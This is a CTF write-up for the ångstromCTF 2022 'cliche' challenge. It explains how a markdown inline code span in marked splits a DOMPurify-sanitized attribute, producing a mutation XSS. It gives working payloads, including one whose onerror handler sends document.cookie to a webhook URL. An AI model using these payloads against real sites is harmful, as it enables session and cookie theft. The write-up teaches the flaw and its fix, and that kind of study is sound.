Cliche Writeup — ångstromCTF 2022

Mutation XSS in DOMPurify and marked

FHantke
InfoSec Write-ups


Last weekend, I played ångstromCTF 2022 with my team FAUST. During the CTF, I came across a simply constructed but clever web challenge that I want to share with you. This is the writeup for cliche. If you are only here for the solution, feel free to skip to the end of the last section.

The Challenge

The challenge text promised the least interesting web challenge, a promise I have to disagree with. Besides the link to the challenge, we were given an admin bot that holds the flag in its cookies and visits any link it receives.

Tired and desolate, clam gave up on writing creative web. Instead, he spun the wheel of overused challenge ideas three times, and got “pastebin”, “markdown”, and “input sanitization.” Lo and behold, the least interesting web challenge in the world.

The challenge page consists of a textarea and a button.

When we open the challenge, we only see a textarea to add content and a button to view it. Clicking the button reloads the page with the textarea content as a URL parameter: https://cliche.web.actf.co/?content=<u>foobar</u>. The page then renders the content. However, no obvious XSS works, so we take a look at the source code next.

<script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js"></script>
...
<script>
const qs = new URLSearchParams(location.search);
if (qs.get("content")?.length > 0) {
  document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get("content")));
}
</script>

The code reveals why no basic XSS works. As the challenge text already spoils, an HTML sanitizer is in place. Before the content is added to the body, the page first sanitizes it with DOMPurify (version 2.3.6) and then parses it with the markdown library marked (version 4.0.14). Both libraries are used in their latest versions at the time of the CTF.
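
For example, a naive attempt with an inline event handler never survives the sanitizer. A quick check in the browser console (my own probe, not part of the challenge) shows DOMPurify stripping the handler:

DOMPurify.sanitize('<img src=x onerror=alert(1)>');
// Output
'<img src="x">'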

Since I’ve been studying weird parsing behavior lately, it was clear to me that this challenge was about finding a mutation XSS payload.

Mutation XSS

What is mutation XSS (mXSS)? The concept of mXSS is well explained in a paper by Heiderich et al. In short, benign-looking content mutates into malicious content as it passes through multiple rounds of parsing and serialization. To illustrate this, look at the following example:

let init = '<form id="first"><div></form><form id="second">';
document.body.innerHTML = init;           // parse the string with the browser
let mutated_1 = document.body.innerHTML;  // serialize the resulting DOM back to a string
document.body.innerHTML = mutated_1;      // parse that serialized string again
let mutated_2 = document.body.innerHTML;  // serialize once more
console.log(init);
console.log(mutated_1);
console.log(mutated_2);
// Output
<form id="first"><div></form><form id="second">
<form id="first"><div><form id="second"></form></div></form>
<form id="first"><div></div></form>

We can see that the init HTML string mutates each time it is parsed and re-serialized via innerHTML. That seems strange, since we would expect HTML to keep its form, but this is exactly the behavior defined by the HTML specification.

Nowadays, HTML sanitizers and filters usually parse and re-serialize their input before the browser renders it, in order to defeat complex obfuscation techniques. However, as we have seen above, HTML content does not always stay the same and can change across multiple parsing rounds. In fact, such weird HTML edge cases have led to various bypasses, for instance in DOMPurify version 2.0.0 or version 2.0.17, and even to an XSS in Google Search.

Solution

With the previous section in mind, we can see that the challenge chains three consecutive parsers: the input is parsed first by DOMPurify, then by marked, and finally by the browser via innerHTML. This reeks of mXSS.
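
To make the chain explicit, here is the relevant line of the challenge again, annotated with the three parsing steps (the comments are mine):

// 1. DOMPurify parses the raw input and serializes the sanitized DOM back into a string
// 2. marked parses that string as markdown and emits new HTML
// 3. the browser parses the result once more when it is assigned to innerHTML
document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get("content")));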

After unsuccessfully playing around with typical mXSS techniques, such as table, form, or style elements, I focused on the markdown part and tried out multiple markdown constructs combined with HTML content that could trigger XSS. Since DOMPurify filters all malicious parts of the HTML, it was clear to me that I had to find a markdown construct that breaks the HTML, so that I could forge a malicious payload from content hidden in a benign HTML location, e.g., an attribute. This was when I found the markdown inline code span (`).

var inp = '`<p id="aaa`bbb">';
document.body.innerHTML = marked.parse(DOMPurify.sanitize(inp));
// Output
'<p><code>&lt;p id=&quot;aaa</code>bbb&quot;&gt;</p></p>\n'

As demonstrated above, the markdown inline code is prioritized over the HTML element and breaks it apart: the first half ends up inside a code element, while the second half is left outside. Exactly what I needed!

// Payload
`<p x="`<img src=x onerror=alert(1)>"></p>
// Output
<p><code>&lt;p x=&quot;</code><img src=x onerror=alert(1)>&quot;&gt;</p></p>

The payload looks harmless to DOMPurify, since the malicious part sits inside an attribute value where it can do no damage. But then marked breaks the attribute apart and wraps the first half in a code element. As a result, the image element ends up outside the attribute, is parsed as a regular element, and triggers the alert.

The final payload that I sent to the bot looked like the following and gave me the flag:

https://cliche.web.actf.co/?content=`%3Cp%20x=%22%3Cimg%20src=x%20onerror=fetch(window.location.hash.substring(1)%2Bdocument.cookie)%3Efoo%3C/img%3E%22%20title=%22hello`%22%3E%3Cimg%20src=x%3E%3C/p%3E#https://webhook.site/1b96a1e3-307b-4f46-9f3a-e3eba4cc538d?x=

// Output on webhook.site:
actf{my_code_is_upside_down_topsy_turvy_1029318}
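
URL-decoded, the content parameter looks like this:

// Decoded content parameter
`<p x="<img src=x onerror=fetch(window.location.hash.substring(1)+document.cookie)>foo</img>" title="hello`"><img src=x></p>

The exfiltration target is passed in the URL fragment after the #, so it never reaches the server; window.location.hash.substring(1) resolves to the webhook URL, and the fetch appends the bot's cookie, flag included. The second backtick, hidden in the title attribute, plays the same role as in the simplified payload above: it closes the inline code span so that the image element with the onerror handler ends up outside of it.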

Conclusion

This exciting challenge showed once again how easily bugs creep into code, even when the initial intention was good. The funny thing is that marked even recommends DOMPurify as a sanitizer. However, as we can see, this only works if sanitization is the last step in the pipeline.
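
A minimal sketch of what that would look like in the challenge code, assuming everything else stays the same, is to run the sanitizer on the HTML that marked produces:

// Sanitize after markdown parsing, as the final step before touching the DOM
document.body.innerHTML = DOMPurify.sanitize(marked.parse(qs.get("content")));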

Besides my own solution, I am sure there are more interesting ways to solve the challenge, and I am curious to see what other solutions are possible.

https://twitter.com/fh4ntke
